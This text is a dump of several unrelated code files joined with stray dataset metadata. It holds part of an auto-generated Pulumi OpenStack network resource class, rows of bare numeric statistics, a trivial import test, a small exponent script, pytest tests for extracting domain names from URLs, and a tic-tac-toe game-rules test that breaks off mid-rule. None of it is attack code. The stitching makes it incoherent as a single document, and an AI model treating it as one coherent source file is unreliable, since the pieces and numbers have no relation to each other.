openstack:networking/network:Network network_1 d90ce693-5ccf-4136-a0ed-152ce412b6b9 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the name of the existing network. :param pulumi.Input[str] dns_domain: The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. :param pulumi.Input[int] mtu: The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network. :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy. :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]] segments: An array of one or more provider segment objects. :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network. :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options. """ ... @overload def __init__(__self__, resource_name: str, args: Optional[NetworkArgs] = None, opts: Optional[pulumi.ResourceOptions] = None): """ Manages a V2 Neutron network resource within OpenStack. ## Example Usage ```python import pulumi import pulumi_openstack as openstack network1 = openstack.networking.Network("network1", admin_state_up=True) subnet1 = openstack.networking.Subnet("subnet1", cidr="192.168.199.0/24", ip_version=4, network_id=network1.id) secgroup1 = openstack.compute.SecGroup("secgroup1", description="a security group", rules=[openstack.compute.SecGroupRuleArgs( cidr="0.0.0.0/0", from_port=22, ip_protocol="tcp", to_port=22, )]) port1 = openstack.networking.Port("port1", admin_state_up=True, fixed_ips=[openstack.networking.PortFixedIpArgs( ip_address="192.168.199.10", subnet_id=subnet1.id, )], network_id=network1.id, security_group_ids=[secgroup1.id]) instance1 = openstack.compute.Instance("instance1", networks=[openstack.compute.InstanceNetworkArgs( port=port1.id, )], security_groups=[secgroup1.name]) ``` ## Import Networks can be imported using the `id`, e.g. ```sh $ pulumi import openstack:networking/network:Network network_1 d90ce693-5ccf-4136-a0ed-152ce412b6b9 ``` :param str resource_name: The name of the resource. :param NetworkArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(NetworkArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, admin_state_up: Optional[pulumi.Input[bool]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = NetworkArgs.__new__(NetworkArgs) __props__.__dict__["admin_state_up"] = admin_state_up __props__.__dict__["availability_zone_hints"] = availability_zone_hints __props__.__dict__["description"] = description __props__.__dict__["dns_domain"] = dns_domain __props__.__dict__["external"] = external __props__.__dict__["mtu"] = mtu __props__.__dict__["name"] = name __props__.__dict__["port_security_enabled"] = port_security_enabled __props__.__dict__["qos_policy_id"] = qos_policy_id __props__.__dict__["region"] = region __props__.__dict__["segments"] = segments __props__.__dict__["shared"] = shared __props__.__dict__["tags"] = tags __props__.__dict__["tenant_id"] = tenant_id __props__.__dict__["transparent_vlan"] = transparent_vlan __props__.__dict__["value_specs"] = value_specs __props__.__dict__["all_tags"] = None super(Network, __self__).__init__( 'openstack:networking/network:Network', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, admin_state_up: Optional[pulumi.Input[bool]] = None, all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Network': """ Get an existing Network resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the network, which have been explicitly and implicitly added. :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the name of the existing network. :param pulumi.Input[str] dns_domain: The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. :param pulumi.Input[int] mtu: The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network. :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy. :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]] segments: An array of one or more provider segment objects. :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network. :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _NetworkState.__new__(_NetworkState) __props__.__dict__["admin_state_up"] = admin_state_up __props__.__dict__["all_tags"] = all_tags __props__.__dict__["availability_zone_hints"] = availability_zone_hints __props__.__dict__["description"] = description __props__.__dict__["dns_domain"] = dns_domain __props__.__dict__["external"] = external __props__.__dict__["mtu"] = mtu __props__.__dict__["name"] = name __props__.__dict__["port_security_enabled"] = port_security_enabled __props__.__dict__["qos_policy_id"] = qos_policy_id __props__.__dict__["region"] = region __props__.__dict__["segments"] = segments __props__.__dict__["shared"] = shared __props__.__dict__["tags"] = tags __props__.__dict__["tenant_id"] = tenant_id __props__.__dict__["transparent_vlan"] = transparent_vlan __props__.__dict__["value_specs"] = value_specs return Network(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="adminStateUp") def admin_state_up(self) -> pulumi.Output[bool]: """ The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. """ return pulumi.get(self, "admin_state_up") @property @pulumi.getter(name="allTags") def all_tags(self) -> pulumi.Output[Sequence[str]]: """ The collection of tags assigned on the network, which have been explicitly and implicitly added. """ return pulumi.get(self, "all_tags") @property @pulumi.getter(name="availabilityZoneHints") def availability_zone_hints(self) -> pulumi.Output[Sequence[str]]: """ An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. """ return pulumi.get(self, "availability_zone_hints") @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ Human-readable description of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "description") @property @pulumi.getter(name="dnsDomain") def dns_domain(self) -> pulumi.Output[str]: """ The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. """ return pulumi.get(self, "dns_domain") @property @pulumi.getter def external(self) -> pulumi.Output[bool]: """ Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. """ return pulumi.get(self, "external") @property @pulumi.getter def mtu(self) -> pulumi.Output[int]: """ The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. """ return pulumi.get(self, "mtu") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "name") @property @pulumi.getter(name="portSecurityEnabled") def port_security_enabled(self) -> pulumi.Output[bool]: """ Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. """ return pulumi.get(self, "port_security_enabled") @property @pulumi.getter(name="qosPolicyId") def qos_policy_id(self) -> pulumi.Output[str]: """ Reference to the associated QoS policy. """ return pulumi.get(self, "qos_policy_id") @property @pulumi.getter def region(self) -> pulumi.Output[str]: """ The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. """ return pulumi.get(self, "region") @property @pulumi.getter def segments(self) -> pulumi.Output[Optional[Sequence['outputs.NetworkSegment']]]: """ An array of one or more provider segment objects. """ return pulumi.get(self, "segments") @property @pulumi.getter def shared(self) -> pulumi.Output[bool]: """ Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. """ return pulumi.get(self, "shared") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Sequence[str]]]: """ A set of string tags for the network. """ return pulumi.get(self, "tags") @property @pulumi.getter(name="tenantId") def tenant_id(self) -> pulumi.Output[str]: """ The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. """ return pulumi.get(self, "tenant_id") @property @pulumi.getter(name="transparentVlan") def transparent_vlan(self) -> pulumi.Output[bool]: """ Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. """ return pulumi.get(self, "transparent_vlan") @property @pulumi.getter(name="valueSpecs") def value_specs(self) -> pulumi.Output[Optional[Mapping[str, Any]]]: """ Map of additional options. """ return pulumi.get(self, "value_specs")
46.418966
151
0.64456
6,462
53,846
5.216806
0.045033
0.085818
0.083415
0.035241
0.950016
0.941354
0.933583
0.930468
0.928955
0.919344
0
0.003737
0.264495
53,846
1,159
152
46.459016
0.847465
0.43903
0
0.875926
1
0
0.087043
0.01972
0
0
0
0
0
1
0.166667
false
0.001852
0.012963
0
0.27963
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
af118a2888bdee390e6a737f34f366d1752d0b00
51
py
Python
pkgs/constructor-2.1.1-py37_0/info/test/run_test.py
AXGKl/be_black
810df50ab33fe614786af5dc8216daff74db32df
[ "BSD-3-Clause" ]
null
null
null
pkgs/constructor-2.1.1-py37_0/info/test/run_test.py
AXGKl/be_black
810df50ab33fe614786af5dc8216daff74db32df
[ "BSD-3-Clause" ]
1
2019-04-02T23:35:13.000Z
2019-04-02T23:35:13.000Z
pkgs/constructor-2.1.1-py37_0/info/test/run_test.py
AXGKl/be_black
810df50ab33fe614786af5dc8216daff74db32df
[ "BSD-3-Clause" ]
null
null
null
print("import: 'constructor'") import constructor
12.75
30
0.764706
5
51
7.8
0.6
0.871795
0
0
0
0
0
0
0
0
0
0
0.098039
51
3
31
17
0.847826
0
0
0
0
0
0.42
0
0
0
0
0
0
1
0
true
0
1
0
1
0.5
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
1
0
7
af68e7843b7fd079fb421a58aae4d3b126674538
379
py
Python
exponentcode.py
shyed2001/Python_Programming
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
[ "bzip2-1.0.6" ]
2
2019-05-01T04:32:14.000Z
2019-05-04T11:28:18.000Z
exponentcode.py
shyed2001/python-learning-basics
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
[ "bzip2-1.0.6" ]
null
null
null
exponentcode.py
shyed2001/python-learning-basics
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
[ "bzip2-1.0.6" ]
null
null
null
print(''' Exponent code Exponent code ''') print(''' def answer2(number, power): result=1 for index in range(power): result=result * number return result print(answer2(3,2)) ''') print(''' ''') def answer2(number, power): result=1 for index in range(power): result=result * number return result print(answer2(3,2))
16.478261
31
0.588391
47
379
4.744681
0.340426
0.197309
0.134529
0.188341
0.869955
0.869955
0.869955
0.869955
0.869955
0.869955
0
0.036101
0.269129
379
22
32
17.227273
0.768953
0
0
1
0
0
0.484594
0
0
0
0
0
0
1
0.05
false
0
0
0
0.15
0.25
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
af8163d87a4994839a814645823e1622a6cf164b
1,530
py
Python
python/kyu_5/test_extract_the_domain_name_from_a_url.py
fkandzia/codewars
b80fd200ce75e938bc4fd2313e28de6a34c46e71
[ "BSD-2-Clause" ]
null
null
null
python/kyu_5/test_extract_the_domain_name_from_a_url.py
fkandzia/codewars
b80fd200ce75e938bc4fd2313e28de6a34c46e71
[ "BSD-2-Clause" ]
null
null
null
python/kyu_5/test_extract_the_domain_name_from_a_url.py
fkandzia/codewars
b80fd200ce75e938bc4fd2313e28de6a34c46e71
[ "BSD-2-Clause" ]
null
null
null
import pytest from python.kyu_5.extract_the_domain_name_from_a_url import domain_name, domain_name_2 class TestDomainName: @pytest.mark.parametrize( ("url", "domain"), [ ("http://github.com/carbonfive/raygun", "github"), ("http://www.zombie-bites.com", "zombie-bites"), ("https://www.cnet.com", "cnet"), ("http://google.com", "google"), ("http://google.co.jp", "google"), ("https://youtube.com", "youtube"), ("www.xakep.ru", "xakep"), ("google.com", "google") ]) def test_valid_url_should_return_domain_name(self, url, domain): assert domain_name(url) == domain def test_url_without_protocol_should_return_None(self): assert domain_name("Lorem ipsum") is None class TestDomainName2: @pytest.mark.parametrize( ("url", "domain"), [ ("http://github.com/carbonfive/raygun", "github"), ("http://www.zombie-bites.com", "zombie-bites"), ("https://www.cnet.com", "cnet"), ("http://google.com", "google"), ("http://google.co.jp", "google"), ("https://youtube.com", "youtube"), ("www.xakep.ru", "xakep"), ("google.com", "google") ]) def test_valid_url_should_return_domain_name(self, url, domain): assert domain_name_2(url) == domain def test_url_without_protocol_should_return_None(self): assert domain_name_2("Lorem ipsum") is None
32.553191
86
0.575163
175
1,530
4.8
0.268571
0.107143
0.071429
0.057143
0.816667
0.816667
0.816667
0.816667
0.816667
0.816667
0
0.004382
0.254248
1,530
46
87
33.26087
0.731814
0
0
0.722222
0
0
0.302554
0
0
0
0
0
0.111111
1
0.111111
false
0
0.055556
0
0.222222
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
bb61e1c68b7e76aa760936bce2e47a9dfe5336fc
13,553
py
Python
pyhsfc/test/pyhsfc-tictactoe-test.py
AbdallahS/ggp-hsfc
3f2b80382f3ae8558553da07f1de5bdf5a143832
[ "BSD-2-Clause" ]
1
2019-02-01T04:46:20.000Z
2019-02-01T04:46:20.000Z
pyhsfc/test/pyhsfc-tictactoe-test.py
AbdallahS/ggp-hsfc
3f2b80382f3ae8558553da07f1de5bdf5a143832
[ "BSD-2-Clause" ]
null
null
null
pyhsfc/test/pyhsfc-tictactoe-test.py
AbdallahS/ggp-hsfc
3f2b80382f3ae8558553da07f1de5bdf5a143832
[ "BSD-2-Clause" ]
null
null
null
#!/usr/bin/env python import re import unittest from pyhsfc import * #------------------------------------------------------------- # #------------------------------------------------------------- g_ttt1=""" ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Tictactoe ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Components ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (role white) (role black) (<= (base (cell ?m ?n x)) (index ?m) (index ?n)) (<= (base (cell ?m ?n o)) (index ?m) (index ?n)) (<= (base (cell ?m ?n b)) (index ?m) (index ?n)) (base (control white)) (base (control black)) (<= (input ?r (mark ?m ?n)) (role ?r) (index ?m) (index ?n)) (<= (input ?r noop) (role ?r)) (index 1) (index 2) (index 3) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; init ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (init (cell 1 1 b)) (init (cell 1 2 b)) (init (cell 1 3 b)) (init (cell 2 1 b)) (init (cell 2 2 b)) (init (cell 2 3 b)) (init (cell 3 1 b)) (init (cell 3 2 b)) (init (cell 3 3 b)) (init (control white)) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; legal ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (<= (legal ?w (mark ?x ?y)) (true (cell ?x ?y b)) (true (control ?w))) (<= (legal white noop) (true (control black))) (<= (legal black noop) (true (control white))) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; next ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (<= (next (cell ?m ?n x)) (does white (mark ?m ?n)) (true (cell ?m ?n b))) (<= (next (cell ?m ?n o)) (does black (mark ?m ?n)) (true (cell ?m ?n b))) (<= (next (cell ?m ?n ?w)) (true (cell ?m ?n ?w)) (distinct ?w b)) (<= (next (cell ?m ?n b)) (does ?w (mark ?j ?k)) (true (cell ?m ?n b)) (distinct ?m ?j)) (<= (next (cell ?m ?n b)) (does ?w (mark ?j ?k)) (true (cell ?m ?n b)) (distinct ?n ?k)) (<= (next (control white)) (true (control black))) (<= (next (control black)) (true (control white))) (<= (row ?m ?x) (true (cell ?m 1 ?x)) (true (cell ?m 2 ?x)) (true (cell ?m 3 ?x))) (<= (column ?n ?x) (true (cell 1 ?n ?x)) (true (cell 2 ?n ?x)) (true (cell 3 ?n ?x))) (<= (diagonal ?x) (true (cell 1 1 ?x)) (true (cell 2 2 ?x)) (true (cell 3 3 ?x))) (<= (diagonal ?x) (true (cell 1 3 ?x)) (true (cell 2 2 ?x)) (true (cell 3 1 ?x))) (<= (line ?x) (row ?m ?x)) (<= (line ?x) (column ?m ?x)) (<= (line ?x) (diagonal ?x)) (<= open (true (cell ?m ?n b))) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; goal ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (<= (goal white 100) (line x) (not (line o))) (<= (goal white 50) (not (line x)) (not (line o))) (<= (goal white 0) (not (line x)) (line o)) (<= (goal black 100) (not (line x)) (line o)) (<= (goal black 50) (not (line x)) (not (line o))) (<= (goal black 0) (line x) (not (line o))) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; terminal ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (<= terminal (line x)) (<= terminal (line o)) (<= terminal (not open)) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; """ #---------------------------------------------------------- # Tictactoe that is generated by the Dresden game controller #---------------------------------------------------------- g_ttt2="""(ROLE WHITE) (ROLE BLACK) (<= (BASE (CELL ?M ?N X)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N O)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N B)) (INDEX ?M) (INDEX ?N)) (BASE (CONTROL WHITE)) (BASE (CONTROL BLACK)) (<= (INPUT ?R (MARK ?M ?N)) (ROLE ?R) (INDEX ?M) (INDEX ?N)) (<= (INPUT ?R NOOP) (ROLE ?R)) (INDEX 1) (INDEX 2) (INDEX 3) (INIT (CELL 1 1 B)) (INIT (CELL 1 2 B)) (INIT (CELL 1 3 B)) (INIT (CELL 2 1 B)) (INIT (CELL 2 2 B)) (INIT (CELL 2 3 B)) (INIT (CELL 3 1 B)) (INIT (CELL 3 2 B)) (INIT (CELL 3 3 B)) (INIT (CONTROL WHITE)) (<= (LEGAL ?W (MARK ?X ?Y)) (TRUE (CELL ?X ?Y B)) (TRUE (CONTROL ?W))) (<= (LEGAL WHITE NOOP) (TRUE (CONTROL BLACK))) (<= (LEGAL BLACK NOOP) (TRUE (CONTROL WHITE))) (<= (NEXT (CELL ?M ?N X)) (DOES WHITE (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N O)) (DOES BLACK (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N ?W)) (TRUE (CELL ?M ?N ?W)) (DISTINCT ?W B)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?M ?J)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?N ?K)) (<= (NEXT (CONTROL WHITE)) (TRUE (CONTROL BLACK))) (<= (NEXT (CONTROL BLACK)) (TRUE (CONTROL WHITE))) (<= (ROW ?M ?X) (TRUE (CELL ?M 1 ?X)) (TRUE (CELL ?M 2 ?X)) (TRUE (CELL ?M 3 ?X))) (<= (COLUMN ?N ?X) (TRUE (CELL 1 ?N ?X)) (TRUE (CELL 2 ?N ?X)) (TRUE (CELL 3 ?N ?X))) (<= (DIAGONAL ?X) (TRUE (CELL 1 1 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 3 ?X))) (<= (DIAGONAL ?X) (TRUE (CELL 1 3 ?X)) (TRUE (CELL 2 2 ?X)) (TRUE (CELL 3 1 ?X))) (<= (LINE ?X) (ROW ?M ?X)) (<= (LINE ?X) (COLUMN ?M ?X)) (<= (LINE ?X) (DIAGONAL ?X)) (<= OPEN (TRUE (CELL ?M ?N B))) (<= (GOAL WHITE 100) (LINE X) (NOT (LINE O))) (<= (GOAL WHITE 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL WHITE 0) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 100) (NOT (LINE X)) (LINE O)) (<= (GOAL BLACK 50) (NOT (LINE X)) (NOT (LINE O))) (<= (GOAL BLACK 0) (LINE X) (NOT (LINE O))) (<= TERMINAL (LINE X)) (<= TERMINAL (LINE O)) (<= TERMINAL (NOT OPEN))""" #---------------------------------------------------------- # Tictactoe generated by the Dresden game controller but with line breaks added #---------------------------------------------------------- g_ttt3=""" (ROLE WHITE) (ROLE BLACK) (<= (BASE (CELL ?M ?N X)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N O)) (INDEX ?M) (INDEX ?N)) (<= (BASE (CELL ?M ?N B)) (INDEX ?M) (INDEX ?N)) (BASE (CONTROL WHITE)) (BASE (CONTROL BLACK)) (<= (INPUT ?R (MARK ?M ?N)) (ROLE ?R) (INDEX ?M) (INDEX ?N)) (<= (INPUT ?R NOOP) (ROLE ?R)) (INDEX 1) (INDEX 2) (INDEX 3) (INIT (CELL 1 1 B)) (INIT (CELL 1 2 B)) (INIT (CELL 1 3 B)) (INIT (CELL 2 1 B)) (INIT (CELL 2 2 B)) (INIT (CELL 2 3 B)) (INIT (CELL 3 1 B)) (INIT (CELL 3 2 B)) (INIT (CELL 3 3 B)) (INIT (CONTROL WHITE)) (<= (LEGAL ?W (MARK ?X ?Y)) (TRUE (CELL ?X ?Y B)) (TRUE (CONTROL ?W))) (<= (LEGAL WHITE NOOP) (TRUE (CONTROL BLACK))) (<= (LEGAL BLACK NOOP) (TRUE (CONTROL WHITE))) (<= (NEXT (CELL ?M ?N X)) (DOES WHITE (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N O)) (DOES BLACK (MARK ?M ?N)) (TRUE (CELL ?M ?N B))) (<= (NEXT (CELL ?M ?N ?W)) (TRUE (CELL ?M ?N ?W)) (DISTINCT ?W B)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?M ?J)) (<= (NEXT (CELL ?M ?N B)) (DOES ?W (MARK ?J ?K)) (TRUE (CELL ?M ?N B)) (DISTINCT ?N ?K)) (<= (NEXT (CONTROL WHITE)) (TRUE (CONTROL BLACK))) (<= (NEXT (CONTROL BLACK)) (TRUE (CONTROL WHITE))) (<= (ROW ?M ?X) (TRUE (CELL ?M 1 ?X)) (TRUE (CELL ?M 2 ?X)) (TRUE (CELL ?M 3 ?X))) (<= (COLUMN ?N ?X) (TRUE (CELL 1 ?N ?X)) (TRUE (CELL 2 ?N ?X)) (TRUE (CELL 3 ?N ?X))) (<= 